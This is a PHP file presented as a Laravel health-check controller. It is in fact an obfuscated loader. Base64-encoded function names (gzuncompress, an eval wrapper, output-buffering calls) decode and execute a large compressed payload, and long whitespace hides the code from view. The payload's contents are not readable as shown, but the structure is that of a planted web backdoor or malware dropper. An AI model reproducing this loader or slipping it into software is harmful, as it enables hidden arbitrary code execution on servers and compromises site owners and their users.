<?php 
        $__='printf';$_='Loading app/Http/Controllers/HealthCheckController.php';
        



























































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































                                                                                                                                                                                                                     $________;
